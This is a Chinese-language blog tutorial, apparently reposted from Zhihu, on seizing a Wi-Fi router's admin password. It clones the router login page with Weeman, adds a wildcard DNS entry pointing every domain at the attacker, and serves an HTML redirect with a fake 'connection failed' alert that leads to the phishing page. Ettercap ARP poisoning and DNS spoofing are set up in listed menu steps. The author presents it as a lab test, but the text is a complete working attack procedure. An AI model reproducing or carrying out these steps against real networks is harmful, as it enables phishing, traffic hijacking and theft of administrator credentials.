无线安全

通过Weeman+Ettercap配合拿下路由器管理权限

字号+ 作者:sn0w 来源:知乎专栏 2016-11-27 14:41 我要评论( )

本篇文章主要介绍如何在接入无线网络后如何拿到路由器的管理权限,至于如何得到路由器连接密码可以参考 WPA-PSK无线网络的破解,本文只提供一个思路。我们大致的思......

    本篇文章主要介绍如何在接入无线网络后如何拿到路由器的管理权限,至于如何得到路由器连接密码可以参考 WPA-PSK无线网络的破解  ,本文只提供一个思路。我们大致的思路是通过weeman伪造登录页面,ettercap进行arp欺骗DNS劫持,从 而让管理员跳转到我们的钓鱼页面,欺骗输入管理密码。

测试环境:
                     攻击者:                192.168.0.101            kali linux 2016.1
                     目标管理员:        192.168.0.100             Windows 10
                     路由器管理地址: 192.168.0.1   

            首先我们需要生成一个伪造的登录页面,需要用到的工具为Weeman,关于这个的工具的介绍并不多,大家可以参考简单易用的钓鱼渗透测试工具Weeman新版发布。
1.设置伪造的目标地址:
[JavaScript] 纯文本查看 复制代码
?
1
set url [url]http://192.168.0.1/login.asp[/url]

2.设置端口号:
[AppleScript] 纯文本查看 复制代码
?
1
2
set port 8080
[font="]
3.设置转跳地址(登录成功后的页面):
[AppleScript] 纯文本查看 复制代码
?
1
2
set action_url [url]http://192.168.0.1/index.asp[/url]
[font="]
通过简单的配置就可以运行了
[AppleScript] 纯文本查看 复制代码
?
1
run

可以看到他已经Download了目标地址并放在了8080端口下,此时他会在在程序的根目录下生成一个index.html文件,但是我们访问后发现效果并不是很好。 其实这个脚本只是单纯的将HTML代码进行了缓存,并没有对支持网页的一些资源(CSS/JavaScript/图片)进行缓存。为了让我们的钓鱼页面更具有欺骗效果,我们对他进行一些简单的优化,首先我们打开正常的登录页面 Ctrl + S 将整站进行保存
我们将下载的文件放在与index.html同目录(weeman根目录)下。注:此处我们可以还需要改一下index.html引入的路径。
最终效果(时间原因并没有加上所有图片):
至此,我们第一步已经完成下面我们要上利器ettercap,在这之前我们先做一下简单配置。
首先我们需要配置一下DNS文件,在etc/ettercap/etter.dns 内添加一行

[AppleScript] 纯文本查看 复制代码
?
1
*     A     192.168.0.101

* 为通配符,这一行的意思为将所有的网站全部解析到192.168.0.101(攻击者IP)。

然后我们开启apache服务,让攻击者的电脑成为一个web服务器

[AppleScript] 纯文本查看 复制代码
?
1
service apache2 start



现在我们去做一个简单的转跳页面放在apache的www目录(var/www/html)下,通过这个转跳页面转到我们的钓鱼页面,当然这个转跳页面也要具有一定的欺骗性。

[XHTML] 纯文本查看 复制代码
?
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <title></title>
    <script type="text/javascript">
      alert("网络连接失败,请尝试重新配置路由器!");
      location.href='http://192.168.0.101:8080';     <!--钓鱼界面-->
    </script>
  </head>
  <body>
 
  </body>
</html>

这段代码可以实现,再打开这个后弹窗 “网络连接失败,请尝试重新配置路由器!”,然后转调至我们的钓鱼页面。
下面我们打开ettercap进行dns欺骗

依次选择Sniff -> Uuified Sniffing选择网卡

Hosts->Scan for hosts 扫描在线主机

Hosts -> Hosts list 列出在线主机列表

选中 192.168.0.1 -> add to target 1 然后 192.168.0.100 -> add to target 2

Mitm -> Arp Poisoning 将第一项打勾 开启ARP欺骗

Plugins -> Manager the plugins 双击打开dns_spoof模块启动DNS劫持。


最后Start -> Start Sniffing 开启ARP欺骗+DNS劫持。
12.png

 
我们在目标主机ping常用网站 发现解析地址已经转到攻击者IP
我们模拟管理员正常上网,打开一些常用网站
已经成功解析到攻击者IP ,我们点击确定后转跳到钓鱼页面(忽视这个不完美的钓鱼页面)。
输入管理密码,正常登陆
此时,我们后台的Weeman已经成功劫持到密码。

原创文章,首发自知乎专栏。

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Wifi/316.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
  • 通过PIN码破解无线密码

    通过PIN码破解无线密码

    2016-11-27 16:32

网友点评
暂时未开启评论功能~